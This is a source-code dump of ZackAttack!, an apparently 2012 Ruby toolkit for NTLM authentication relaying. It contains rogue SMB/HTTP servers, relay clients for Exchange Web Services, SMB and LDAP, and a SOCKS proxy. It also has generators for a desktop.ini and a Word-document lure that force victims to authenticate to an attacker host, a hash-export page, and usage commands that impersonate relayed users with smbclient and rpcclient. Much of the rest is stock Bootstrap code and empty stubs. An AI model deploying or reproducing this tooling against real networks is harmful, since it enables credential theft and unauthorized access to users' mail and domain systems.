├── clients ├── mssql.rb ├── psexec.rb ├── sharepoint.rb ├── staticchal.rb ├── apireq.rb ├── smb.rb ├── ews.rb └── ldap.rb ├── bootstrap ├── img │ ├── glyphicons-halflings.png │ └── glyphicons-halflings-white.png ├── quick.erb ├── 404.erb ├── config.erb ├── logs.erb ├── index.erb ├── footer.erb ├── help.erb ├── js │ ├── bootstrap-transition.js │ ├── bootstrap-dropdown.js │ ├── bootstrap-popover.js │ ├── bootstrap-modal.js │ ├── bootstrap-typeahead.js │ ├── bootstrap-tooltip.js │ └── bootstrap.min.js ├── clients.erb ├── header.erb ├── leftbar.erb ├── 101.erb ├── users.erb ├── css │ ├── bootstrap-responsive.min.css │ └── bootstrap-responsive.css ├── payloads.erb └── rules.erb ├── lib ├── zfcli.rb ├── zfclient.rb ├── zfadmingui.rb ├── zfhttpd.rb ├── zfsmbd.rb ├── zfsocks.rb ├── zfntlm.rb └── zfdb.rb ├── results └── wtf.txt ├── payloads ├── webpage.rb ├── email.rb ├── worddoc.rb └── desktopini.rb ├── ChangeLog.md ├── LICENSE ├── zackattack.rb ├── config.rb └── README.md /clients/mssql.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | #encoding: ASCII-8BIT 3 | =begin 4 | mssql 5 | =end -------------------------------------------------------------------------------- /clients/psexec.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | #encoding: ASCII-8BIT 3 | =begin 4 | psexec relay 5 | =end -------------------------------------------------------------------------------- /clients/sharepoint.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | #encoding: ASCII-8BIT 3 | =begin 4 | sharepoint dumps! 5 | =end 6 | -------------------------------------------------------------------------------- /bootstrap/img/glyphicons-halflings.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/urbanesec/ZackAttack/HEAD/bootstrap/img/glyphicons-halflings.png -------------------------------------------------------------------------------- /bootstrap/img/glyphicons-halflings-white.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/urbanesec/ZackAttack/HEAD/bootstrap/img/glyphicons-halflings-white.png -------------------------------------------------------------------------------- /lib/zfcli.rb: -------------------------------------------------------------------------------- 1 | =begin 2 | 3 | coming eventually. on the todo list 4 | =end 5 | 6 | module ZFadmingui 7 | class Cli 8 | 9 | end 10 | 11 | end -------------------------------------------------------------------------------- /results/wtf.txt: -------------------------------------------------------------------------------- 1 | Results from certian modules go here into a textfile for now since they are too large for a db storage... you know... like full inbox dumps. 2 | -------------------------------------------------------------------------------- /payloads/webpage.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | #encoding: ASCII-8BIT 3 | =begin 4 | javascript for injection into webpages (detect browser + os and provide payload accordingly) 5 | options include exploit method for firefox/safari (force download / addon exploitation ) 6 | =end 7 | -------------------------------------------------------------------------------- /bootstrap/quick.erb: -------------------------------------------------------------------------------- 1 | 2 | <%=ZFadmingui.Header%> 3 |
4 |
5 |

Coming Soon-ish

6 |

There are no quickrules written out yet, but will come soon. Think auto generation of common flows.

7 |
8 |
9 | <%=ZFadmingui.Footer%> -------------------------------------------------------------------------------- /payloads/email.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | #encoding: ASCII-8BIT 3 | =begin 4 | for generating html embeded emails for pwning outlook. options include attachments to add to file 5 | 6 | 7 | OPTIONS 8 | - Subject / Sender / Body Text 9 | - Embed Img 10 | - Attach HTML file 11 | - Attach Word Doc 12 | - Link in email to click 13 | 14 | 15 | =end 16 | 17 | -------------------------------------------------------------------------------- /bootstrap/404.erb: -------------------------------------------------------------------------------- 1 | 2 | <%=ZFadmingui.Header%> 3 |
4 |
5 |

404ed!

6 |

This Page Doesn't Exist, fool. And even if it was supposed to, you're in the wrong either way.

7 |

Requested URI: <%=servlet_request.request_uri%> 8 |

9 |
10 | <%=ZFadmingui.Footer%> -------------------------------------------------------------------------------- /bootstrap/config.erb: -------------------------------------------------------------------------------- 1 | 2 | <%=ZFadmingui.Header%> 3 |
4 |
5 |

Config Coming Soon

6 |

Right now, no live dynamic config is available, but will be soon-ish. For now, check config.rb in base. Configs will include small stuff such as server name, guid, etc.

7 |
8 |
9 | <%=ZFadmingui.Footer%> -------------------------------------------------------------------------------- /payloads/worddoc.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | #encoding: ASCII-8BIT 3 | =begin 4 | for generating img embeded into word docs 5 | =end 6 | 7 | module ZFPayload 8 | class Worddoc 9 | def self.build(ip,path,file,params=nil) 10 | content = " 11 | 12 | 13 | 14 | 15 | " 16 | return content 17 | end 18 | end 19 | end -------------------------------------------------------------------------------- /payloads/desktopini.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | #encoding: ASCII-8BIT 3 | =begin 4 | desktop.ini generation 5 | 6 | [.ShellClassInfo] 7 | IconResource=\\ipaddr\share\path 8 | [ViewState] 9 | FolderType=Generic 10 | 11 | attrib +H desktop.ini 12 | =end 13 | 14 | module ZFPayload 15 | class Desktopini 16 | def self.build(ip,path,file,params=nil) 17 | payload = "[.ShellClassInfo] 18 | IconResource=\\\\" + ip + "\\" + path + "\\" + file + " 19 | [ViewState] 20 | FolderType=Generic 21 | " 22 | return payload 23 | end 24 | end 25 | end -------------------------------------------------------------------------------- /bootstrap/logs.erb: -------------------------------------------------------------------------------- 1 | 2 | <%=ZFadmingui.Header%> 3 |
4 |
5 |

Logs and shiznit

6 |
7 |
8 |

Export Hashes

9 | 
<%	a = ZFdb::DB.new
10 | a.ExportHashes.each do |val|
11 | if val[3].length == 48%><%=val[9] +"::" + val[10] + ":" + val[4] + ":" + val[3] + ":" + val[2]%><%elsif val[3].length !=0 %><%=val[9] +"::" + val[10] + ":" + val[2] + ":" + val[3][0,32] + ":" + val[3][32..-1]%><%end%>
12 | 
13 | <%end%>
14 |
15 | <%=ZFadmingui.Footer%> -------------------------------------------------------------------------------- /clients/staticchal.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | #encoding: ASCII-8BIT 3 | =begin 4 | static 112233.... 5 | =end 6 | require 'base64' 7 | require 'zfntlm' 8 | module ZFClient 9 | class StaticType2 10 | def initialize (server,port) 11 | @server = "woof" 12 | return true 13 | end 14 | 15 | def connect 16 | 17 | end 18 | 19 | def sendtype1(type1msg) 20 | a = ZFNtlm::Message.new() 21 | return a.buildtype2 22 | end 23 | 24 | def sendtype3(type3msg, rawpkt, details=nil) 25 | return 26 | end 27 | 28 | def execute 29 | 30 | end 31 | end 32 | end 33 | -------------------------------------------------------------------------------- /ChangeLog.md: -------------------------------------------------------------------------------- 1 | ### 0.1.1 / 2012-08-29 2 | 3 | * Disabled Left Nav Bar Dropdown Rules as they were not coded. Coming soon. 4 | * Updated Users page to include auth method and path. Integrated coding to ignore IPC$ 5 | * Fixed EWS bug where CHANGEME was not being replaced in the xml with a folder name. 6 | * Fixed issue with random auths failing due to use of gsub("\n","") of base64 encoded api data and \x0a used in some ntlm auths. 7 | * Fixed Rule logic for user not executing rules on first connection attempt (i.e. no user id created and recieving 0) 8 | * Fixed typo for Errno::EACCES 9 | * Fixed issue with left bar not removing users after connection terminates 10 | 11 | ### 0.1.0 / 2012-08-08 12 | 13 | * Initial release: 14 | -------------------------------------------------------------------------------- /clients/apireq.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | #encoding: ASCII-8BIT 3 | =begin 4 | api requests 5 | =end 6 | require 'zfdb' 7 | require 'base64' 8 | 9 | module ZFClient 10 | class Apireq 11 | def initialize (server,port) 12 | @db = ZFdb::DB.new 13 | @reqid = server 14 | @uid = port 15 | end 16 | 17 | def sendtype1(type1msg) 18 | res = @db.ProcessApiReq(@reqid) #type2msg 19 | return Base64.decode64(res[2])#.gsub("\n",'') 20 | end 21 | 22 | def sendtype3(type3msg, rawpkt, details) 23 | begin 24 | 25 | @db.SetApiResp(@reqid,Base64.encode64(type3msg).gsub("\n",'').strip) 26 | rescue 27 | puts $! end 28 | end 29 | 30 | 31 | end 32 | end -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | I'll figure out which licenscing scheme to use later, but for now: 2 | outside of the bootstrap library for the gui which follows Apache 2.0 License couresty of Twitter.... 3 | 4 | Copyright (c) 2012, Zack Fasel 5 | All rights reserved. 6 | 7 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 8 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 9 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 10 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR 11 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 12 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 13 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND 14 | ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 15 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 16 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. -------------------------------------------------------------------------------- /bootstrap/index.erb: -------------------------------------------------------------------------------- 1 | <% 2 | db = ZFdb::DB.new() 3 | results = db.GetActiveSessions() 4 | %> 5 | <%= ZFadmingui.Header %> 6 | 7 |
8 | <%= ZFadmingui.Leftbar %> 9 |
10 |
11 |
12 |

Welcome to ZackAttack!

13 |

Extermely Alpha Version 0.a.lessfail - Posted August 29th 2012 - CHECK FOR UPDATES VIA GIT!!

14 |

This is a new level of relaying NTLM authentication requets

15 |
16 |
17 |
18 | 19 |

Getting Started

If you havn't noticed, look up ;). All the navigation is across the top.

20 |

News and Update Notes

21 |

There's a LOT more to come. Now that the framework is in place, we can start to build more of the automation and clients.

22 |
23 |
24 | 25 | <%= ZFadmingui.Footer %> 26 | -------------------------------------------------------------------------------- /zackattack.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | #encoding: ASCII-8BIT 3 | $: << File.expand_path(File.dirname(__FILE__)) 4 | $: << File.expand_path(File.dirname(__FILE__) + "/lib") 5 | $: << File.expand_path(File.dirname(__FILE__) + "/clients") 6 | $: << File.expand_path(File.dirname(__FILE__) + "/payloads") 7 | require 'config' 8 | require 'zfhttpd' 9 | require 'zfsmbd' 10 | require 'zfadmingui' 11 | require 'zfsocks' 12 | puts "==================================================" 13 | puts "Here Goes ZackAttack! Booting Up!....." 14 | puts "==================================================" 15 | #clear out old sessions / stuf TODO: consolidate into an init sequence / db cleanup 16 | db = ZFdb::DB.new() 17 | # TODO catch readonly andother db errors 18 | db.ClearActiveSessions 19 | db.db.execute("DELETE FROM aresults") 20 | 21 | smb = ZFsmb::Server.new(SMBDIP) #only works on 445 22 | http = ZFhttpd::Server.new(HTTPIP,HTTPPort) 23 | 24 | gui = ZFadmingui::Http.new(MGMTIP,MGMTPort) 25 | socks = ZFsocks::Server.new(SOCKSIP,SOCKSPort) 26 | #add CLI 27 | c = Thread.new{gui.start()} 28 | d = Thread.new{socks.start()} 29 | b = Thread.new{smb.start()} 30 | a = Thread.new{http.start()} 31 | c.join 32 | puts "exiting" -------------------------------------------------------------------------------- /config.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | #encoding: ASCII-8BIT 3 | =begin 4 | 5 | ##################################################################### 6 | 7 | YOUR CONFIGS!!!!!! RAWR 8 | TODO: Put in a real about for the configs :) 9 | 10 | ##################################################################### 11 | 12 | So things the user should set after startup 13 | - Domain Controllers (if external) 14 | - dns server? 15 | - EWS target 16 | - default domain for 1122334455667788 17 | - default hostname for 1122334455667788 18 | - default challange hash 19 | - socks ports to disect (i.e. 445,445/8443,80/8080/8000, etc.) 20 | =end 21 | SMBDIP = "0.0.0.0" 22 | HTTPIP = "0.0.0.0" 23 | HTTPPort = "80" 24 | MGMTIP = "0.0.0.0" 25 | MGMTPort = "4531" 26 | SOCKSIP = "127.0.0.1" 27 | SOCKSPort = "4532" 28 | 29 | MGMTUser = "zf" 30 | MGMTPass = "zf" 31 | 32 | APIUser = "api" 33 | APIPass = "api" 34 | 35 | DBFile = File.expand_path(File.dirname(__FILE__) + "/za.db") 36 | 37 | GUID = "\x6e\x09\x9f\x3f\x4a\xf0\x64\x4f\xa2\x9f\xd8\xb2\xd6\x5f\x4f\x7d" 38 | NativeOS = "Unix" 39 | NativeLM = "Samba" 40 | 41 | =begin 42 | Configs to add: 43 | httpd bind ip 44 | smbd bind ip 45 | managmeent port / password 46 | api password 47 | database file 48 | =end 49 | -------------------------------------------------------------------------------- /bootstrap/footer.erb: -------------------------------------------------------------------------------- 1 |
2 | 3 |
4 | 5 | 8 | 9 | 10 | 11 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 32 | 33 | 34 | 35 | -------------------------------------------------------------------------------- /bootstrap/help.erb: -------------------------------------------------------------------------------- 1 | <%=ZFadmingui.Header%> 2 |
3 |
4 |

HALP!

5 |
6 |

WTF is this Tool?

7 |

ZackAttack! is a combination servers, clients, ruleset, and payload generator for relaying NTLM network auth requests. More details can be found at zfasel.com/ntlm

8 |

xyz Isnt Working

9 |

This tool is still HIGHLY ALPHA. There's next to no error output or logging. With that said, if you come across a problem, let me know and I'll do my best to figure out the issue / patch the code. There are some circumstances where stuff will just not work(i.e. smb signing), and in the future versions i'll try to include detection and notification of this instead of just failing

10 |

I have a feature request!

11 |

Awesome. Let me know about it or better yet, code it and i'll integrate it :).

12 |

I Need More Help!

13 |

Honestly, There's no help right now. It's what you get for free. If you want to toss me redbull/vodka money on the other hand in return for some help / as a thank you....

14 |

Email : dc20 [at] zfasel [dot] com / Twitter: @zfasel

15 |
16 |
17 | <%=ZFadmingui.Footer%> -------------------------------------------------------------------------------- /bootstrap/js/bootstrap-transition.js: -------------------------------------------------------------------------------- 1 | /* =================================================== 2 | * bootstrap-transition.js v2.0.4 3 | * http://twitter.github.com/bootstrap/javascript.html#transitions 4 | * =================================================== 5 | * Copyright 2012 Twitter, Inc. 6 | * 7 | * Licensed under the Apache License, Version 2.0 (the "License"); 8 | * you may not use this file except in compliance with the License. 9 | * You may obtain a copy of the License at 10 | * 11 | * http://www.apache.org/licenses/LICENSE-2.0 12 | * 13 | * Unless required by applicable law or agreed to in writing, software 14 | * distributed under the License is distributed on an "AS IS" BASIS, 15 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 16 | * See the License for the specific language governing permissions and 17 | * limitations under the License. 18 | * ========================================================== */ 19 | 20 | 21 | !function ($) { 22 | 23 | $(function () { 24 | 25 | "use strict"; // jshint ;_; 26 | 27 | 28 | /* CSS TRANSITION SUPPORT (http://www.modernizr.com/) 29 | * ======================================================= */ 30 | 31 | $.support.transition = (function () { 32 | 33 | var transitionEnd = (function () { 34 | 35 | var el = document.createElement('bootstrap') 36 | , transEndEventNames = { 37 | 'WebkitTransition' : 'webkitTransitionEnd' 38 | , 'MozTransition' : 'transitionend' 39 | , 'OTransition' : 'oTransitionEnd' 40 | , 'msTransition' : 'MSTransitionEnd' 41 | , 'transition' : 'transitionend' 42 | } 43 | , name 44 | 45 | for (name in transEndEventNames){ 46 | if (el.style[name] !== undefined) { 47 | return transEndEventNames[name] 48 | } 49 | } 50 | 51 | }()) 52 | 53 | return transitionEnd && { 54 | end: transitionEnd 55 | } 56 | 57 | })() 58 | 59 | }) 60 | 61 | }(window.jQuery); -------------------------------------------------------------------------------- /lib/zfclient.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | #encoding: ASCII-8BIT 3 | =begin 4 | exchange web services client 5 | =end 6 | require 'ews' 7 | require 'smb' 8 | require 'ldap' 9 | require 'staticchal' 10 | require 'zfdb' 11 | require 'apireq' 12 | 13 | 14 | module ZFClient 15 | class Router 16 | def initialize (uid,timeout) 17 | #puts "uid" 18 | #puts uid.inspect 19 | 20 | @db = ZFdb::DB.new 21 | begin 22 | item = nil 23 | Timeout.timeout(timeout) { 24 | while item == nil do 25 | item = @db.GetApiReq(uid) 26 | if item == nil then item = @db.GetTodoItem(uid)[0] end 27 | if item == nil then sleep 0.2 end 28 | end 29 | @details = {"uid" => uid, "aid" => item["aid"],"tid" => item["tid"] } 30 | @arid = @db.ActionPerformed(item["aid"],item["tid"],uid) 31 | @tip = item["tipaddr"] 32 | 33 | # Look for stuff from db a loop minding timeout 34 | # try to connect minding timeout 35 | # if can't connect, break it and repeat trying to find stuff 36 | mtype = item["moduleid"] 37 | if mtype == 1 then 38 | puts "EWS Action " + @tip 39 | if !(@client = ZFClient::EWS.new(@tip,443)) then 40 | #todo CONNECTION REFUSED ERRORS! 41 | puts "FAIL!" 42 | end 43 | elsif mtype == 2 then 44 | puts "SMB Action " + @tip 45 | if !(@client = ZFClient::Smb.new(@tip,445)) then 46 | puts "FAIL!" 47 | end 48 | elsif mtype == 3 then 49 | puts "LDAP Action " + @tip 50 | if !(@client = ZFClient::Ldap.new(@tip,389)) then 51 | puts "FAIL!" 52 | end 53 | elsif mtype == 0 then 54 | puts "API Action " + @tip 55 | @client = ZFClient::Apireq.new(@tip,uid) 56 | end 57 | 58 | } 59 | rescue Timeout::Error 60 | puts "No Instructions for " + uid.to_s 61 | end 62 | if @client == nil 63 | @client = ZFClient::StaticType2.new("0.0.0.0",0) 64 | end 65 | end 66 | 67 | def sendtype1(ntlmdata) 68 | return @client.sendtype1(ntlmdata) 69 | end 70 | def sendtype3(ntlmdata,rawpkt=nil) 71 | # this should be a send it and forget it kind of thing. should be already threaded by httpd and smbd 72 | #puts "Type3Data sending to client" 73 | @client.sendtype3(ntlmdata,rawpkt,@details) 74 | end 75 | end 76 | end 77 | -------------------------------------------------------------------------------- /bootstrap/clients.erb: -------------------------------------------------------------------------------- 1 | 2 | <%=ZFadmingui.Header%> 3 |
4 |

Clients

5 |

Most of the clients right now are written in as auto-clients into the rules. There are 2 manual driven clients available at release time now


6 |

SOCKS Proxy


7 |

SMB

8 |

Im not going to write a whole howto to do this, but you can use proxychains wrapped with smbclient or any other tool that uses smb on 445. The socks proxy will see the NTLM auth packets, snatch the type2 response, pass it to the tool, and then rewrite the type3 response.

9 |

The easiest way to explain this is with a code example. Say i see user testdom\testuser connecting. After configuring proxychains, 10 | 

11 | [ProxyList]
12 | socks5	127.0.0.1	4532
13 |
14 | I can do...

15 | 
16 | proxychains smbclient -U testdom/testuer%anybspassitignoresit //targetip/share
17 |
18 |

Cool? I think so. But how about just enmueration?

19 | 
20 | proxychains rpcclient -c 'enumalsgroups builtin' -U 'domain\machinename$'%'anypassworditignoresitanyways' 'targetIP'
21 |
22 |

That's right. It works with HOSTNAME$ system accounts. Mind blown yet?

23 |

HTTP

24 |

Not supported yet, but won't take much to add. It's coming soon.


25 |

API requests

26 |

So using the admin UI (default port 4531), and using basic auth, you can request type3 responses by passing the type2 of the target you recieve. This can be obviously added into any tool you want (similar to how squirtle was written).

27 | 
28 | http://<adminuiip>:<adminuiport>/api/?a=type2&d=<userdomainyouwant>@u=<useryouwant>&msg=<base64encode(type2msg)>
29 |
30 |

So for example, for api basic auth of api:api and wanting to auth as testdom\testuser...

31 | 
32 | http://api:api@127.0.0.1:4531/api/?a=type2&d=testdom&u=testuser&msg=TlRMTVNTUAACAAAADAAMADgAAAAVgoFiESIzRFVmd4gAAAAAAAAAAGYAZgBEAAAABgGwHQAAAA9EAE8ATQBBAEkATgACAAwARABPAE0AQQBJAE4AAQAQAEgATwBTAFQATgBBAE0ARQAEABQARABPAE0AQQBJAE4ALgBUAEwARAADACIAUwBFAFIAVgBFAFIALgBEAE8ATQBBAEkATgAuAFQATABEAAAAAAA=
33 |
34 |

Response with the type3 base64 encoded. The page waits for a response up until a timeout is reached. Fixes are needed if timeout is reached for now, but it works. Alpha-ish.


35 |

More Clients?

36 |

More request driven vs. rule driven clients are coming. Soon.

37 |
38 | <%=ZFadmingui.Footer%> -------------------------------------------------------------------------------- /bootstrap/header.erb: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | ZackAttack! - Go Go Gadget NTLM Relay! 6 | 7 | 8 | 9 | 10 | 11 | 20 | 21 | 22 | 23 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 |
38 |
39 |
40 | 41 | ZackAttack! 42 |
43 | 72 |
73 |
74 |
75 |
76 |
77 |
78 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ===== 2 | ZackAttack! - Realying NTLM Like Nobody's Business 3 | ===== 4 | 5 | 6 | ======= 7 | WTF Is This? 8 | ======= 9 | 10 | tl;dr version - ZackAttack! is a new Tool Set to do NTLM Authentication relaying unlike any other tool currently out there. 11 | 12 | = 13 | So how is ZackAttack! different / better? Compared to other tools... 14 | = 15 | 16 | - Supports NTLMv2 :) 17 | - Brings up external impact for NTLM by relaying to external Exchange Web Services servers ( think mobile phone users :) ) 18 | - Custom Rogue HTTP and SMB Server funneling into a single pooled source and knows who the user is and keeps them authenticating without closing the socket 19 | - Rule based logic to auto-perform actions upon seing a user belonging to a group. When no rule exists, the rogue server holds on to the auth session as long as possible until a rule or api request comes in. 20 | - Auto / Guided generation to creating methods to get users to auto-authenticate without interaction 21 | - New methods for client auto authentication including geting FF/Chrome to auto-auth via UNC SMB shares (similar to IE) 22 | - Relaying to LDAP (critical for relaying to Domain Controllers), Exchange Web Services, and soon mssql. 23 | - SOCKS proxy to allow NTLM relay attacks with your favorite tools (proxychains smbclient....etc) 24 | - Focuses on not just poping the shells that traditional relays do, but leveraging dumb users as well and getting data through them. 25 | 26 | So much for tl;dr ;) The goal? A Firesheep esque tool for relaying NTLM auths 27 | 28 | = 29 | How do I Get Started 30 | = 31 | 32 | 1) ruby zackattack.rb 33 | 34 | 2) open your favorite browser to http://zf:zf@localhost:4531/ 35 | 36 | 3) ..... 37 | 38 | 4) PROFIT! Or not. It's alpha still. 39 | 40 | Code is written for ruby1.9 but should work with 1.8. Requires net/http(s) and webrick rubygems 41 | 42 | = 43 | So What Are the Components 44 | = 45 | 46 | The Rogue Servers - HTTP and SMB. These get the auth requests and keep recycling them 47 | 48 | The Clients - These connect to target servers and request NTLM creds from the Rogue Servers 49 | 50 | The Rules - Define auto actions to perform upon seeing a user. 51 | 52 | The Payloads - Methods to get users to autoauth with Integrated Windows Auth ergo not prompting the user for auth. 53 | 54 | = 55 | XYZ Doesn't work 56 | = 57 | 58 | I'm sure it doesn't ;) I don't always code in ruby, but when i do, i make sure to introduce as many bugs as possible :) 59 | 60 | Submit as much info as you can (comfortably) to the issues page. Please try to get a wireshark / pcap capture if it's a client issue. If it contains sensitive data (i.e. ntlm creds of a client) let me know and we can work around that if possible. 61 | 62 | Feature request? I want to hear it! Check the todo file and see if i already mentioned it in there, otherwise submit! 63 | 64 | I'll fill in more details later.... -------------------------------------------------------------------------------- /bootstrap/leftbar.erb: -------------------------------------------------------------------------------- 1 | <% 2 | db = ZFdb::DB.new() 3 | results = db.GetActiveSessions() 4 | users = db.GetUsers() 5 | %> 6 | 7 |
8 |

Connected RIGHT NOW!

9 | 45 | 46 |

Recent Requests

47 | 48 |
    49 | <%users.each do |udata| 50 | if udata[4] != nil 51 | if udata[2] == "" then udata[2] = "WORKGROUP" end 52 | %> 53 |
  • 54 | <%= udata[2]%>\<%= udata[1]%> 55 |
    • 56 | 57 | <%end 58 | end%> 59 | <%if users == {} then%> 60 |
  • 61 | No Historical Hosts 62 |
    • 63 | <%end%> 64 |
65 |

"shells" or the like

66 | Coming Soon :) 67 |
68 | 69 | 90 | -------------------------------------------------------------------------------- /bootstrap/js/bootstrap-dropdown.js: -------------------------------------------------------------------------------- 1 | /* ============================================================ 2 | * bootstrap-dropdown.js v2.0.4 3 | * http://twitter.github.com/bootstrap/javascript.html#dropdowns 4 | * ============================================================ 5 | * Copyright 2012 Twitter, Inc. 6 | * 7 | * Licensed under the Apache License, Version 2.0 (the "License"); 8 | * you may not use this file except in compliance with the License. 9 | * You may obtain a copy of the License at 10 | * 11 | * http://www.apache.org/licenses/LICENSE-2.0 12 | * 13 | * Unless required by applicable law or agreed to in writing, software 14 | * distributed under the License is distributed on an "AS IS" BASIS, 15 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 16 | * See the License for the specific language governing permissions and 17 | * limitations under the License. 18 | * ============================================================ */ 19 | 20 | 21 | !function ($) { 22 | 23 | "use strict"; // jshint ;_; 24 | 25 | 26 | /* DROPDOWN CLASS DEFINITION 27 | * ========================= */ 28 | 29 | var toggle = '[data-toggle="dropdown"]' 30 | , Dropdown = function (element) { 31 | var $el = $(element).on('click.dropdown.data-api', this.toggle) 32 | $('html').on('click.dropdown.data-api', function () { 33 | $el.parent().removeClass('open') 34 | }) 35 | } 36 | 37 | Dropdown.prototype = { 38 | 39 | constructor: Dropdown 40 | 41 | , toggle: function (e) { 42 | var $this = $(this) 43 | , $parent 44 | , selector 45 | , isActive 46 | 47 | if ($this.is('.disabled, :disabled')) return 48 | 49 | selector = $this.attr('data-target') 50 | 51 | if (!selector) { 52 | selector = $this.attr('href') 53 | selector = selector && selector.replace(/.*(?=#[^\s]*$)/, '') //strip for ie7 54 | } 55 | 56 | $parent = $(selector) 57 | $parent.length || ($parent = $this.parent()) 58 | 59 | isActive = $parent.hasClass('open') 60 | 61 | clearMenus() 62 | 63 | if (!isActive) $parent.toggleClass('open') 64 | 65 | return false 66 | } 67 | 68 | } 69 | 70 | function clearMenus() { 71 | $(toggle).parent().removeClass('open') 72 | } 73 | 74 | 75 | /* DROPDOWN PLUGIN DEFINITION 76 | * ========================== */ 77 | 78 | $.fn.dropdown = function (option) { 79 | return this.each(function () { 80 | var $this = $(this) 81 | , data = $this.data('dropdown') 82 | if (!data) $this.data('dropdown', (data = new Dropdown(this))) 83 | if (typeof option == 'string') data[option].call($this) 84 | }) 85 | } 86 | 87 | $.fn.dropdown.Constructor = Dropdown 88 | 89 | 90 | /* APPLY TO STANDARD DROPDOWN ELEMENTS 91 | * =================================== */ 92 | 93 | $(function () { 94 | $('html').on('click.dropdown.data-api', clearMenus) 95 | $('body') 96 | .on('click.dropdown', '.dropdown form', function (e) { e.stopPropagation() }) 97 | .on('click.dropdown.data-api', toggle, Dropdown.prototype.toggle) 98 | }) 99 | 100 | }(window.jQuery); -------------------------------------------------------------------------------- /bootstrap/js/bootstrap-popover.js: -------------------------------------------------------------------------------- 1 | /* =========================================================== 2 | * bootstrap-popover.js v2.0.4 3 | * http://twitter.github.com/bootstrap/javascript.html#popovers 4 | * =========================================================== 5 | * Copyright 2012 Twitter, Inc. 6 | * 7 | * Licensed under the Apache License, Version 2.0 (the "License"); 8 | * you may not use this file except in compliance with the License. 9 | * You may obtain a copy of the License at 10 | * 11 | * http://www.apache.org/licenses/LICENSE-2.0 12 | * 13 | * Unless required by applicable law or agreed to in writing, software 14 | * distributed under the License is distributed on an "AS IS" BASIS, 15 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 16 | * See the License for the specific language governing permissions and 17 | * limitations under the License. 18 | * =========================================================== */ 19 | 20 | 21 | !function ($) { 22 | 23 | "use strict"; // jshint ;_; 24 | 25 | 26 | /* POPOVER PUBLIC CLASS DEFINITION 27 | * =============================== */ 28 | 29 | var Popover = function ( element, options ) { 30 | this.init('popover', element, options) 31 | } 32 | 33 | 34 | /* NOTE: POPOVER EXTENDS BOOTSTRAP-TOOLTIP.js 35 | ========================================== */ 36 | 37 | Popover.prototype = $.extend({}, $.fn.tooltip.Constructor.prototype, { 38 | 39 | constructor: Popover 40 | 41 | , setContent: function () { 42 | var $tip = this.tip() 43 | , title = this.getTitle() 44 | , content = this.getContent() 45 | 46 | $tip.find('.popover-title')[this.isHTML(title) ? 'html' : 'text'](title) 47 | $tip.find('.popover-content > *')[this.isHTML(content) ? 'html' : 'text'](content) 48 | 49 | $tip.removeClass('fade top bottom left right in') 50 | } 51 | 52 | , hasContent: function () { 53 | return this.getTitle() || this.getContent() 54 | } 55 | 56 | , getContent: function () { 57 | var content 58 | , $e = this.$element 59 | , o = this.options 60 | 61 | content = $e.attr('data-content') 62 | || (typeof o.content == 'function' ? o.content.call($e[0]) : o.content) 63 | 64 | return content 65 | } 66 | 67 | , tip: function () { 68 | if (!this.$tip) { 69 | this.$tip = $(this.options.template) 70 | } 71 | return this.$tip 72 | } 73 | 74 | }) 75 | 76 | 77 | /* POPOVER PLUGIN DEFINITION 78 | * ======================= */ 79 | 80 | $.fn.popover = function (option) { 81 | return this.each(function () { 82 | var $this = $(this) 83 | , data = $this.data('popover') 84 | , options = typeof option == 'object' && option 85 | if (!data) $this.data('popover', (data = new Popover(this, options))) 86 | if (typeof option == 'string') data[option]() 87 | }) 88 | } 89 | 90 | $.fn.popover.Constructor = Popover 91 | 92 | $.fn.popover.defaults = $.extend({} , $.fn.tooltip.defaults, { 93 | placement: 'right' 94 | , content: '' 95 | , template: '

